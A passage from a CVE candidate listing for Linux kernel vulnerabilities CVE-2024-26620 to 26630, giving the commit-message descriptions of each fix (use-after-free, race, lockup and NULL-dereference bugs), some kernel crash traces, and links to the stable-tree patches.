| MISC:https://git.kernel.org/stable/c/380540bb06bb1d1b12bdc947d1b8f56cda6b5663 | URL:https://git.kernel.org/stable/c/380540bb06bb1d1b12bdc947d1b8f56cda6b5663 | MISC:https://git.kernel.org/stable/c/3bb5849675ae1d592929798a2b37ea450879c855 | URL:https://git.kernel.org/stable/c/3bb5849675ae1d592929798a2b37ea450879c855 | MISC:https://git.kernel.org/stable/c/3cc283fd16fba72e2cefe3a6f48d7a36b0438900 | URL:https://git.kernel.org/stable/c/3cc283fd16fba72e2cefe3a6f48d7a36b0438900 | MISC:https://git.kernel.org/stable/c/62b3387beef11738eb6ce667601a28fa089fa02c | URL:https://git.kernel.org/stable/c/62b3387beef11738eb6ce667601a28fa089fa02c Assigned (20240219)
CVE 2024 26630 Candidate In the Linux kernel, the following vulnerability has been resolved: mm: cachestat: fix folio read-after-free in cache walk In cachestat, we access the folio from the page cache's xarray to compute its page offset, and check for its dirty and writeback flags. However, we do not hold a reference to the folio before performing these actions, which means the folio can concurrently be released and reused as another folio/page/slab. Get around this altogether by just using xarray's existing machinery for the folio page offsets and dirty/writeback states. This changes behavior for tmpfs files to now always report zeroes in their dirty and writeback counters. This is okay as tmpfs doesn't follow conventional writeback cache behavior: its pages get "cleaned" during swapout, after which they're no longer resident etc. MISC:https://git.kernel.org/stable/c/3a75cb05d53f4a6823a32deb078de1366954a804 | URL:https://git.kernel.org/stable/c/3a75cb05d53f4a6823a32deb078de1366954a804 | MISC:https://git.kernel.org/stable/c/ba60fdf75e89ea762bb617be578dc47f27655117 | URL:https://git.kernel.org/stable/c/ba60fdf75e89ea762bb617be578dc47f27655117 | MISC:https://git.kernel.org/stable/c/fe7e008e0ce728252e4ec652cceebcc62211657c | URL:https://git.kernel.org/stable/c/fe7e008e0ce728252e4ec652cceebcc62211657c Assigned (20240219)
CVE 2024 26629 Candidate In the Linux kernel, the following vulnerability has been resolved: nfsd: fix RELEASE_LOCKOWNER The test on so_count in nfsd4_release_lockowner() is nonsense and harmful. Revert to using check_for_locks(), changing that to not sleep. First: harmful. As is documented in the kdoc comment for nfsd4_release_lockowner(), the test on so_count can transiently return a false positive resulting in a return of NFS4ERR_LOCKS_HELD when in fact no locks are held. This is clearly a protocol violation and with the Linux NFS client it can cause incorrect behaviour. If RELEASE_LOCKOWNER is sent while some other thread is still processing a LOCK request which failed because, at the time that request was received, the given owner held a conflicting lock, then the nfsd thread processing that LOCK request can hold a reference (conflock) to the lock owner that causes nfsd4_release_lockowner() to return an incorrect error. The Linux NFS client ignores that NFS4ERR_LOCKS_HELD error because it never sends NFS4_RELEASE_LOCKOWNER without first releasing any locks, so it knows that the error is impossible. It assumes the lock owner was in fact released so it feels free to use the same lock owner identifier in some later locking request. When it does reuse a lock owner identifier for which a previous RELEASE failed, it will naturally use a lock_seqid of zero. However the server, which didn't release the lock owner, will expect a larger lock_seqid and so will respond with NFS4ERR_BAD_SEQID. So clearly it is harmful to allow a false positive, which testing so_count allows. The test is nonsense because ... well... it doesn't mean anything. so_count is the sum of three different counts. 1/ the set of states listed on so_stateids 2/ the set of active vfs locks owned by any of those states 3/ various transient counts such as for conflicting locks. When it is tested against '2' it is clear that one of these is the transient reference obtained by find_lockowner_str_locked(). It is not clear what the other one is expected to be. In practice, the count is often 2 because there is precisely one state on so_stateids. If there were more, this would fail. In my testing I see two circumstances when RELEASE_LOCKOWNER is called. In one case, CLOSE is called before RELEASE_LOCKOWNER. That results in all the lock states being removed, and so the lockowner being discarded (it is removed when there are no more references which usually happens when the lock state is discarded). When nfsd4_release_lockowner() finds that the lock owner doesn't exist, it returns success. The other case shows an so_count of '2' and precisely one state listed in so_stateid. It appears that the Linux client uses a separate lock owner for each file resulting in one lock state per lock owner, so this test on '2' is safe. For another client it might not be safe. So this patch changes check_for_locks() to use the (newish) find_any_file_locked() so that it doesn't take a reference on the nfs4_file and so never calls nfsd_file_put(), and so never sleeps. With this check is it safe to restore the use of check_for_locks() rather than testing so_count against the mysterious '2'. MISC:https://git.kernel.org/stable/c/8f5b860de87039b007e84a28a5eefc888154e098 | URL:https://git.kernel.org/stable/c/8f5b860de87039b007e84a28a5eefc888154e098 | MISC:https://git.kernel.org/stable/c/b7d2eee1f53899b53f069bba3a59a419fc3d331b | URL:https://git.kernel.org/stable/c/b7d2eee1f53899b53f069bba3a59a419fc3d331b | MISC:https://git.kernel.org/stable/c/e4cf8941664cae2f89f0189c29fe2ce8c6be0d03 | URL:https://git.kernel.org/stable/c/e4cf8941664cae2f89f0189c29fe2ce8c6be0d03 | MISC:https://git.kernel.org/stable/c/edcf9725150e42beeca42d085149f4c88fa97afd | URL:https://git.kernel.org/stable/c/edcf9725150e42beeca42d085149f4c88fa97afd Assigned (20240219)
CVE 2024 26628 Candidate ** REJECT ** This CVE ID has been rejected or withdrawn by its CVE Numbering Authority. Assigned (20240219)
CVE 2024 26627 Candidate In the Linux kernel, the following vulnerability has been resolved: scsi: core: Move scsi_host_busy() out of host lock for waking up EH handler Inside scsi_eh_wakeup(), scsi_host_busy() is called & checked with host lock every time for deciding if error handler kthread needs to be waken up. This can be too heavy in case of recovery, such as: - N hardware queues - queue depth is M for each hardware queue - each scsi_host_busy() iterates over (N * M) tag/requests If recovery is triggered in case that all requests are in-flight, each scsi_eh_wakeup() is strictly serialized, when scsi_eh_wakeup() is called for the last in-flight request, scsi_host_busy() has been run for (N * M - 1) times, and request has been iterated for (N*M - 1) * (N * M) times. If both N and M are big enough, hard lockup can be triggered on acquiring host lock, and it is observed on mpi3mr(128 hw queues, queue depth 8169). Fix the issue by calling scsi_host_busy() outside the host lock. We don't need the host lock for getting busy count because host the lock never covers that. [mkp: Drop unnecessary 'busy' variables pointed out by Bart] MISC:https://git.kernel.org/stable/c/07e3ca0f17f579491b5f54e9ed05173d6c1d6fcb | URL:https://git.kernel.org/stable/c/07e3ca0f17f579491b5f54e9ed05173d6c1d6fcb | MISC:https://git.kernel.org/stable/c/4373534a9850627a2695317944898eb1283a2db0 | URL:https://git.kernel.org/stable/c/4373534a9850627a2695317944898eb1283a2db0 | MISC:https://git.kernel.org/stable/c/65ead8468c21c2676d4d06f50b46beffdea69df1 | URL:https://git.kernel.org/stable/c/65ead8468c21c2676d4d06f50b46beffdea69df1 | MISC:https://git.kernel.org/stable/c/d37c1c81419fdef66ebd0747cf76fb8b7d979059 | URL:https://git.kernel.org/stable/c/d37c1c81419fdef66ebd0747cf76fb8b7d979059 | MISC:https://git.kernel.org/stable/c/db6338f45971b4285ea368432a84033690eaf53c | URL:https://git.kernel.org/stable/c/db6338f45971b4285ea368432a84033690eaf53c | MISC:https://git.kernel.org/stable/c/f5944853f7a961fedc1227dc8f60393f8936d37c | URL:https://git.kernel.org/stable/c/f5944853f7a961fedc1227dc8f60393f8936d37c Assigned (20240219)
CVE 2024 26626 Candidate In the Linux kernel, the following vulnerability has been resolved: ipmr: fix kernel panic when forwarding mcast packets The stacktrace was: [ 86.305548] BUG: kernel NULL pointer dereference, address: 0000000000000092 [ 86.306815] #PF: supervisor read access in kernel mode [ 86.307717] #PF: error_code(0x0000) - not-present page [ 86.308624] PGD 0 P4D 0 [ 86.309091] Oops: 0000 [#1] PREEMPT SMP NOPTI [ 86.309883] CPU: 2 PID: 3139 Comm: pimd Tainted: G U 6.8.0-6wind-knet #1 [ 86.311027] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.11.1-0-g0551a4be2c-prebuilt.qemu-project.org 04/01/2014 [ 86.312728] RIP: 0010:ip_mr_forward (/build/work/knet/net/ipv4/ipmr.c:1985) [ 86.313399] Code: f9 1f 0f 87 85 03 00 00 48 8d 04 5b 48 8d 04 83 49 8d 44 c5 00 48 8b 40 70 48 39 c2 0f 84 d9 00 00 00 49 8b 46 58 48 83 e0 fe <80> b8 92 00 00 00 00 0f 84 55 ff ff ff 49 83 47 38 01 45 85 e4 0f [ 86.316565] RSP: 0018:ffffad21c0583ae0 EFLAGS: 00010246 [ 86.317497] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000 [ 86.318596] RDX: ffff9559cb46c000 RSI: 0000000000000000 RDI: 0000000000000000 [ 86.319627] RBP: ffffad21c0583b30 R08: 0000000000000000 R09: 0000000000000000 [ 86.320650] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000001 [ 86.321672] R13: ffff9559c093a000 R14: ffff9559cc00b800 R15: ffff9559c09c1d80 [ 86.322873] FS: 00007f85db661980(0000) GS:ffff955a79d00000(0000) knlGS:0000000000000000 [ 86.324291] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 86.325314] CR2: 0000000000000092 CR3: 000000002f13a000 CR4: 0000000000350ef0 [ 86.326589] Call Trace: [ 86.327036] <TASK> [ 86.327434] ? show_regs (/build/work/knet/arch/x86/kernel/dumpstack.c:479) [ 86.328049] ? __die (/build/work/knet/arch/x86/kernel/dumpstack.c:421 /build/work/knet/arch/x86/kernel/dumpstack.c:434) [ 86.328508] ? page_fault_oops (/build/work/knet/arch/x86/mm/fault.c:707) [ 86.329107] ? do_user_addr_fault (/build/work/knet/arch/x86/mm/fault.c:1264) [ 86.329756] ? srso_return_thunk (/build/work/knet/arch/x86/lib/retpoline.S:223) [ 86.330350] ? __irq_work_queue_local (/build/work/knet/kernel/irq_work.c:111 (discriminator 1)) [ 86.331013] ? exc_page_fault (/build/work/knet/./arch/x86/include/asm/paravirt.h:693 /build/work/knet/arch/x86/mm/fault.c:1515 /build/work/knet/arch/x86/mm/fault.c:1563) [ 86.331702] ? asm_exc_page_fault (/build/work/knet/./arch/x86/include/asm/idtentry.h:570) [ 86.332468] ? ip_mr_forward (/build/work/knet/net/ipv4/ipmr.c:1985) [ 86.333183] ? srso_return_thunk (/build/work/knet/arch/x86/lib/retpoline.S:223) [ 86.333920] ipmr_mfc_add (/build/work/knet/./include/linux/rcupdate.h:782 /build/work/knet/net/ipv4/ipmr.c:1009 /build/work/knet/net/ipv4/ipmr.c:1273) [ 86.334583] ? __pfx_ipmr_hash_cmp (/build/work/knet/net/ipv4/ipmr.c:363) [ 86.335357] ip_mroute_setsockopt (/build/work/knet/net/ipv4/ipmr.c:1470) [ 86.336135] ? srso_return_thunk (/build/work/knet/arch/x86/lib/retpoline.S:223) [ 86.336854] ? ip_mroute_setsockopt (/build/work/knet/net/ipv4/ipmr.c:1470) [ 86.337679] do_ip_setsockopt (/build/work/knet/net/ipv4/ip_sockglue.c:944) [ 86.338408] ? __pfx_unix_stream_read_actor (/build/work/knet/net/unix/af_unix.c:2862) [ 86.339232] ? srso_return_thunk (/build/work/knet/arch/x86/lib/retpoline.S:223) [ 86.339809] ? aa_sk_perm (/build/work/knet/security/apparmor/include/cred.h:153 /build/work/knet/security/apparmor/net.c:181) [ 86.340342] ip_setsockopt (/build/work/knet/net/ipv4/ip_sockglue.c:1415) [ 86.340859] raw_setsockopt (/build/work/knet/net/ipv4/raw.c:836) [ 86.341408] ? security_socket_setsockopt (/build/work/knet/security/security.c:4561 (discriminator 13)) [ 86.342116] sock_common_setsockopt (/build/work/knet/net/core/sock.c:3716) [ 86.342747] do_sock_setsockopt (/build/work/knet/net/socket.c:2313) [ 86.343363] __sys_setsockopt (/build/work/knet/./include/linux/file.h:32 /build/work/kn ---truncated--- MISC:https://git.kernel.org/stable/c/2e8c9ae40adda2be1ba41c05fd3cd1e61cce3207 | URL:https://git.kernel.org/stable/c/2e8c9ae40adda2be1ba41c05fd3cd1e61cce3207 | MISC:https://git.kernel.org/stable/c/d2f1b7fe74afd66298dbb3c7b39e7b62e4df1724 | URL:https://git.kernel.org/stable/c/d2f1b7fe74afd66298dbb3c7b39e7b62e4df1724 | MISC:https://git.kernel.org/stable/c/dcaafdba6c6162bb49f1192850bc3bbc3707738c | URL:https://git.kernel.org/stable/c/dcaafdba6c6162bb49f1192850bc3bbc3707738c Assigned (20240219)
CVE 2024 26625 Candidate In the Linux kernel, the following vulnerability has been resolved: llc: call sock_orphan() at release time syzbot reported an interesting trace [1] caused by a stale sk->sk_wq pointer in a closed llc socket. In commit ff7b11aa481f ("net: socket: set sock->sk to NULL after calling proto_ops::release()") Eric Biggers hinted that some protocols are missing a sock_orphan(), we need to perform a full audit. In net-next, I plan to clear sock->sk from sock_orphan() and amend Eric patch to add a warning. [1] BUG: KASAN: slab-use-after-free in list_empty include/linux/list.h:373 [inline] BUG: KASAN: slab-use-after-free in waitqueue_active include/linux/wait.h:127 [inline] BUG: KASAN: slab-use-after-free in sock_def_write_space_wfree net/core/sock.c:3384 [inline] BUG: KASAN: slab-use-after-free in sock_wfree+0x9a8/0x9d0 net/core/sock.c:2468 Read of size 8 at addr ffff88802f4fc880 by task ksoftirqd/1/27 CPU: 1 PID: 27 Comm: ksoftirqd/1 Not tainted 6.8.0-rc1-syzkaller-00049-g6098d87eaf31 #0 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-debian-1.16.2-1 04/01/2014 Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0xd9/0x1b0 lib/dump_stack.c:106 print_address_description mm/kasan/report.c:377 [inline] print_report+0xc4/0x620 mm/kasan/report.c:488 kasan_report+0xda/0x110 mm/kasan/report.c:601 list_empty include/linux/list.h:373 [inline] waitqueue_active include/linux/wait.h:127 [inline] sock_def_write_space_wfree net/core/sock.c:3384 [inline] sock_wfree+0x9a8/0x9d0 net/core/sock.c:2468 skb_release_head_state+0xa3/0x2b0 net/core/skbuff.c:1080 skb_release_all net/core/skbuff.c:1092 [inline] napi_consume_skb+0x119/0x2b0 net/core/skbuff.c:1404 e1000_unmap_and_free_tx_resource+0x144/0x200 drivers/net/ethernet/intel/e1000/e1000_main.c:1970 e1000_clean_tx_irq drivers/net/ethernet/intel/e1000/e1000_main.c:3860 [inline] e1000_clean+0x4a1/0x26e0 drivers/net/ethernet/intel/e1000/e1000_main.c:3801 __napi_poll.constprop.0+0xb4/0x540 net/core/dev.c:6576 napi_poll net/core/dev.c:6645 [inline] net_rx_action+0x956/0xe90 net/core/dev.c:6778 __do_softirq+0x21a/0x8de kernel/softirq.c:553 run_ksoftirqd kernel/softirq.c:921 [inline] run_ksoftirqd+0x31/0x60 kernel/softirq.c:913 smpboot_thread_fn+0x660/0xa10 kernel/smpboot.c:164 kthread+0x2c6/0x3a0 kernel/kthread.c:388 ret_from_fork+0x45/0x80 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:242 </TASK> Allocated by task 5167: kasan_save_stack+0x33/0x50 mm/kasan/common.c:47 kasan_save_track+0x14/0x30 mm/kasan/common.c:68 unpoison_slab_object mm/kasan/common.c:314 [inline] __kasan_slab_alloc+0x81/0x90 mm/kasan/common.c:340 kasan_slab_alloc include/linux/kasan.h:201 [inline] slab_post_alloc_hook mm/slub.c:3813 [inline] slab_alloc_node mm/slub.c:3860 [inline] kmem_cache_alloc_lru+0x142/0x6f0 mm/slub.c:3879 alloc_inode_sb include/linux/fs.h:3019 [inline] sock_alloc_inode+0x25/0x1c0 net/socket.c:308 alloc_inode+0x5d/0x220 fs/inode.c:260 new_inode_pseudo+0x16/0x80 fs/inode.c:1005 sock_alloc+0x40/0x270 net/socket.c:634 __sock_create+0xbc/0x800 net/socket.c:1535 sock_create net/socket.c:1622 [inline] __sys_socket_create net/socket.c:1659 [inline] __sys_socket+0x14c/0x260 net/socket.c:1706 __do_sys_socket net/socket.c:1720 [inline] __se_sys_socket net/socket.c:1718 [inline] __x64_sys_socket+0x72/0xb0 net/socket.c:1718 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xd3/0x250 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b Freed by task 0: kasan_save_stack+0x33/0x50 mm/kasan/common.c:47 kasan_save_track+0x14/0x30 mm/kasan/common.c:68 kasan_save_free_info+0x3f/0x60 mm/kasan/generic.c:640 poison_slab_object mm/kasan/common.c:241 [inline] __kasan_slab_free+0x121/0x1b0 mm/kasan/common.c:257 kasan_slab_free include/linux/kasan.h:184 [inline] slab_free_hook mm/slub.c:2121 [inlin ---truncated--- MISC:https://git.kernel.org/stable/c/3151051b787f7cd7e3329ea0016eb9113c248812 | URL:https://git.kernel.org/stable/c/3151051b787f7cd7e3329ea0016eb9113c248812 | MISC:https://git.kernel.org/stable/c/64babb17e8150771c58575d8f93a35c5296b499f | URL:https://git.kernel.org/stable/c/64babb17e8150771c58575d8f93a35c5296b499f | MISC:https://git.kernel.org/stable/c/6b950c712a9a05cdda4aea7fcb2848766576c11b | URL:https://git.kernel.org/stable/c/6b950c712a9a05cdda4aea7fcb2848766576c11b | MISC:https://git.kernel.org/stable/c/8e51f084b5716653f19e291ed5f026791d4b3ed4 | URL:https://git.kernel.org/stable/c/8e51f084b5716653f19e291ed5f026791d4b3ed4 | MISC:https://git.kernel.org/stable/c/9c333d9891f34cea8af1b229dc754552304c8eee | URL:https://git.kernel.org/stable/c/9c333d9891f34cea8af1b229dc754552304c8eee | MISC:https://git.kernel.org/stable/c/aa2b2eb3934859904c287bf5434647ba72e14c1c | URL:https://git.kernel.org/stable/c/aa2b2eb3934859904c287bf5434647ba72e14c1c | MISC:https://git.kernel.org/stable/c/d0b5b1f12429df3cd9751ab8b2f53729b77733b7 | URL:https://git.kernel.org/stable/c/d0b5b1f12429df3cd9751ab8b2f53729b77733b7 | MISC:https://git.kernel.org/stable/c/dbc1b89981f9c5360277071d33d7f04a43ffda4a | URL:https://git.kernel.org/stable/c/dbc1b89981f9c5360277071d33d7f04a43ffda4a Assigned (20240219)
CVE 2024 26624 Candidate In the Linux kernel, the following vulnerability has been resolved: af_unix: fix lockdep positive in sk_diag_dump_icons() syzbot reported a lockdep splat [1]. Blamed commit hinted about the possible lockdep violation, and code used unix_state_lock_nested() in an attempt to silence lockdep. It is not sufficient, because unix_state_lock_nested() is already used from unix_state_double_lock(). We need to use a separate subclass. This patch adds a distinct enumeration to make things more explicit. Also use swap() in unix_state_double_lock() as a clean up. v2: add a missing inline keyword to unix_state_lock_nested() [1] WARNING: possible circular locking dependency detected 6.8.0-rc1-syzkaller-00356-g8a696a29c690 #0 Not tainted syz-executor.1/2542 is trying to acquire lock: ffff88808b5df9e8 (rlock-AF_UNIX){+.+.}-{2:2}, at: skb_queue_tail+0x36/0x120 net/core/skbuff.c:3863 but task is already holding lock: ffff88808b5dfe70 (&u->lock/1){+.+.}-{2:2}, at: unix_dgram_sendmsg+0xfc7/0x2200 net/unix/af_unix.c:2089 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -> #1 (&u->lock/1){+.+.}-{2:2}: lock_acquire+0x1e3/0x530 kernel/locking/lockdep.c:5754 _raw_spin_lock_nested+0x31/0x40 kernel/locking/spinlock.c:378 sk_diag_dump_icons net/unix/diag.c:87 [inline] sk_diag_fill+0x6ea/0xfe0 net/unix/diag.c:157 sk_diag_dump net/unix/diag.c:196 [inline] unix_diag_dump+0x3e9/0x630 net/unix/diag.c:220 netlink_dump+0x5c1/0xcd0 net/netlink/af_netlink.c:2264 __netlink_dump_start+0x5d7/0x780 net/netlink/af_netlink.c:2370 netlink_dump_start include/linux/netlink.h:338 [inline] unix_diag_handler_dump+0x1c3/0x8f0 net/unix/diag.c:319 sock_diag_rcv_msg+0xe3/0x400 netlink_rcv_skb+0x1df/0x430 net/netlink/af_netlink.c:2543 sock_diag_rcv+0x2a/0x40 net/core/sock_diag.c:280 netlink_unicast_kernel net/netlink/af_netlink.c:1341 [inline] netlink_unicast+0x7e6/0x980 net/netlink/af_netlink.c:1367 netlink_sendmsg+0xa37/0xd70 net/netlink/af_netlink.c:1908 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg net/socket.c:745 [inline] sock_write_iter+0x39a/0x520 net/socket.c:1160 call_write_iter include/linux/fs.h:2085 [inline] new_sync_write fs/read_write.c:497 [inline] vfs_write+0xa74/0xca0 fs/read_write.c:590 ksys_write+0x1a0/0x2c0 fs/read_write.c:643 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf5/0x230 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b -> #0 (rlock-AF_UNIX){+.+.}-{2:2}: check_prev_add kernel/locking/lockdep.c:3134 [inline] check_prevs_add kernel/locking/lockdep.c:3253 [inline] validate_chain+0x1909/0x5ab0 kernel/locking/lockdep.c:3869 __lock_acquire+0x1345/0x1fd0 kernel/locking/lockdep.c:5137 lock_acquire+0x1e3/0x530 kernel/locking/lockdep.c:5754 __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline] _raw_spin_lock_irqsave+0xd5/0x120 kernel/locking/spinlock.c:162 skb_queue_tail+0x36/0x120 net/core/skbuff.c:3863 unix_dgram_sendmsg+0x15d9/0x2200 net/unix/af_unix.c:2112 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg net/socket.c:745 [inline] ____sys_sendmsg+0x592/0x890 net/socket.c:2584 ___sys_sendmsg net/socket.c:2638 [inline] __sys_sendmmsg+0x3b2/0x730 net/socket.c:2724 __do_sys_sendmmsg net/socket.c:2753 [inline] __se_sys_sendmmsg net/socket.c:2750 [inline] __x64_sys_sendmmsg+0xa0/0xb0 net/socket.c:2750 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf5/0x230 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b other info that might help us debug this: Possible unsafe locking scenario: CPU0 ---truncated--- MISC:https://git.kernel.org/stable/c/4d322dce82a1d44f8c83f0f54f95dd1b8dcf46c9 | URL:https://git.kernel.org/stable/c/4d322dce82a1d44f8c83f0f54f95dd1b8dcf46c9 | MISC:https://git.kernel.org/stable/c/5e7f3e0381c002cb2abde42f09ad511991a8ebaf | URL:https://git.kernel.org/stable/c/5e7f3e0381c002cb2abde42f09ad511991a8ebaf | MISC:https://git.kernel.org/stable/c/875f31aaa67e306098befa5e798a049075910fa7 | URL:https://git.kernel.org/stable/c/875f31aaa67e306098befa5e798a049075910fa7 | MISC:https://git.kernel.org/stable/c/a2104f43876408b164be5fd58f9b6a3a73b77746 | URL:https://git.kernel.org/stable/c/a2104f43876408b164be5fd58f9b6a3a73b77746 | MISC:https://git.kernel.org/stable/c/b169ffde733c5adf01788ae091c377f0eca44806 | URL:https://git.kernel.org/stable/c/b169ffde733c5adf01788ae091c377f0eca44806 | MISC:https://git.kernel.org/stable/c/c2d272a9a1e8f22ba584589219f6fe1886a3595f | URL:https://git.kernel.org/stable/c/c2d272a9a1e8f22ba584589219f6fe1886a3595f | MISC:https://git.kernel.org/stable/c/c8f6b3b864cb876e9ee21666a391c9ee290682ac | URL:https://git.kernel.org/stable/c/c8f6b3b864cb876e9ee21666a391c9ee290682ac | MISC:https://git.kernel.org/stable/c/f199018dc762dfa501f6d96a424468a0f3c10d9e | URL:https://git.kernel.org/stable/c/f199018dc762dfa501f6d96a424468a0f3c10d9e Assigned (20240219)
CVE 2024 26623 Candidate In the Linux kernel, the following vulnerability has been resolved: pds_core: Prevent race issues involving the adminq There are multiple paths that can result in using the pdsc's adminq. [1] pdsc_adminq_isr and the resulting work from queue_work(), i.e. pdsc_work_thread()->pdsc_process_adminq() [2] pdsc_adminq_post() When the device goes through reset via PCIe reset and/or a fw_down/fw_up cycle due to bad PCIe state or bad device state the adminq is destroyed and recreated. A NULL pointer dereference can happen if [1] or [2] happens after the adminq is already destroyed. In order to fix this, add some further state checks and implement reference counting for adminq uses. Reference counting was used because multiple threads can attempt to access the adminq at the same time via [1] or [2]. Additionally, multiple clients (i.e. pds-vfio-pci) can be using [2] at the same time. The adminq_refcnt is initialized to 1 when the adminq has been allocated and is ready to use. Users/clients of the adminq (i.e. [1] and [2]) will increment the refcnt when they are using the adminq. When the driver goes into a fw_down cycle it will set the PDSC_S_FW_DEAD bit and then wait for the adminq_refcnt to hit 1. Setting the PDSC_S_FW_DEAD before waiting will prevent any further adminq_refcnt increments. Waiting for the adminq_refcnt to hit 1 allows for any current users of the adminq to finish before the driver frees the adminq. Once the adminq_refcnt hits 1 the driver clears the refcnt to signify that the adminq is deleted and cannot be used. On the fw_up cycle the driver will once again initialize the adminq_refcnt to 1 allowing the adminq to be used again. MISC:https://git.kernel.org/stable/c/22cd6046eb2148b18990257505834dd45c672a1b | URL:https://git.kernel.org/stable/c/22cd6046eb2148b18990257505834dd45c672a1b | MISC:https://git.kernel.org/stable/c/5939feb63ea1f011027576c64b68b681cbad31ca | URL:https://git.kernel.org/stable/c/5939feb63ea1f011027576c64b68b681cbad31ca | MISC:https://git.kernel.org/stable/c/7e82a8745b951b1e794cc780d46f3fbee5e93447 | URL:https://git.kernel.org/stable/c/7e82a8745b951b1e794cc780d46f3fbee5e93447 Assigned (20240219)
CVE 2024 26622 Candidate In the Linux kernel, the following vulnerability has been resolved: tomoyo: fix UAF write bug in tomoyo_write_control() Since tomoyo_write_control() updates head->write_buf when write() of long lines is requested, we need to fetch head->write_buf after head->io_sem is held. Otherwise, concurrent write() requests can cause use-after-free-write and double-free problems. FEDORA:FEDORA-2024-5db5954a5e | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSXNF4RLEFLH35BFUQGYXRRVHHUIVBAE/ | FEDORA:FEDORA-2024-f797f1540e | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IVVYSTEVMPYGF6GDSOD44MUXZXAZHOHB/ | MISC:https://git.kernel.org/stable/c/2caa605079488da9601099fbda460cfc1702839f | URL:https://git.kernel.org/stable/c/2caa605079488da9601099fbda460cfc1702839f | MISC:https://git.kernel.org/stable/c/2f03fc340cac9ea1dc63cbf8c93dd2eb0f227815 | URL:https://git.kernel.org/stable/c/2f03fc340cac9ea1dc63cbf8c93dd2eb0f227815 | MISC:https://git.kernel.org/stable/c/3bfe04c1273d30b866f4c7c238331ed3b08e5824 | URL:https://git.kernel.org/stable/c/3bfe04c1273d30b866f4c7c238331ed3b08e5824 | MISC:https://git.kernel.org/stable/c/6edefe1b6c29a9932f558a898968a9fcbeec5711 | URL:https://git.kernel.org/stable/c/6edefe1b6c29a9932f558a898968a9fcbeec5711 | MISC:https://git.kernel.org/stable/c/7d930a4da17958f869ef679ee0e4a8729337affc | URL:https://git.kernel.org/stable/c/7d930a4da17958f869ef679ee0e4a8729337affc | MISC:https://git.kernel.org/stable/c/a23ac1788e2c828c097119e9a3178f0b7e503fee | URL:https://git.kernel.org/stable/c/a23ac1788e2c828c097119e9a3178f0b7e503fee Assigned (20240219)
CVE 2024 26621 Candidate In the Linux kernel, the following vulnerability has been resolved: mm: huge_memory: don't force huge page alignment on 32 bit commit efa7df3e3bb5 ("mm: align larger anonymous mappings on THP boundaries") caused two issues [1] [2] reported on 32 bit system or compat userspace. It doesn't make too much sense to force huge page alignment on 32 bit system due to the constrained virtual address space. [1] https://lore.kernel.org/linux-mm/d0a136a0-4a31-46bc-adf4-2db109a61672@kernel.org/ [2] https://lore.kernel.org/linux-mm/CAJuCfpHXLdQy1a2B6xN2d7quTYwg2OoZseYPZTRpU0eHHKD-sQ@mail.gmail.com/ MISC:https://git.kernel.org/stable/c/4ef9ad19e17676b9ef071309bc62020e2373705d | URL:https://git.kernel.org/stable/c/4ef9ad19e17676b9ef071309bc62020e2373705d | MISC:https://git.kernel.org/stable/c/7432376c913381c5f24d373a87ff629bbde94b47 | URL:https://git.kernel.org/stable/c/7432376c913381c5f24d373a87ff629bbde94b47 | MISC:https://git.kernel.org/stable/c/87632bc9ecff5ded93433bc0fca428019bdd1cfe | URL:https://git.kernel.org/stable/c/87632bc9ecff5ded93433bc0fca428019bdd1cfe Assigned (20240219)
CVE 2024 26620 Candidate In the Linux kernel, the following vulnerability has been resolved: s390/vfio-ap: always filter entire AP matrix The vfio_ap_mdev_filter_matrix function is called whenever a new adapter or domain is assigned to the mdev. The purpose of the function is to update the guest's AP configuration by filtering the matrix of adapters and domains assigned to the mdev. When an adapter or domain is assigned, only the APQNs associated with the APID of the new adapter or APQI of the new domain are inspected. If an APQN does not reference a queue device bound to the vfio_ap device driver, then it's APID will be filtered from the mdev's matrix when updating the guest's AP configuration. Inspecting only the APID of the new adapter or APQI of the new domain will result in passing AP queues through to a guest that are not bound to the vfio_ap device driver under certain circumstances. Consider the following: guest's AP configuration (all also assigned to the mdev's matrix): 14.0004 14.0005 14.0006 16.0004 16.0005 16.0006 unassign domain 4 unbind queue 16.0005 assign domain 4 When domain 4 is re-assigned, since only domain 4 will be inspected, the APQNs that will be examined will be: 14.0004 16.0004 Since both of those APQNs reference queue devices that are bound to the vfio_ap device driver, nothing will get filtered from the mdev's matrix when updating the guest's AP configuration. Consequently, queue 16.0005 will get passed through despite not being bound to the driver. This violates the linux device model requirement that a guest shall only be given access to devices bound to the device driver facilitating their pass-through. To resolve this problem, every adapter and domain assigned to the mdev will be inspected when filtering the mdev's matrix. MISC:https://git.kernel.org/stable/c/850fb7fa8c684a4c6bf0e4b6978f4ddcc5d43d11 | URL:https://git.kernel.org/stable/c/850fb7fa8c684a4c6bf0e4b6978f4ddcc5d43d11 | MISC:https://git.kernel.org/stable/c/c69d821197611678533fb3eb784fc823b921349a | URL:https://git.kernel.org/stable/c/c69d821197611678533fb3eb784fc823b921349a | MISC:https://git.kernel.org/stable/c/cdd134d56138302976685e6c7bc4755450b3880e | URL:https://git.kernel.org/stable/c/cdd134d56138302976685e6c7bc4755450b3880e | MISC:https://git.kernel.org/stable/c/d6b8d034b576f406af920a7bee81606c027b24c6 | URL:https://git.kernel.org/stable/c/d6b8d034b576f406af920a7bee81606c027b24c6 Assigned (20240219)
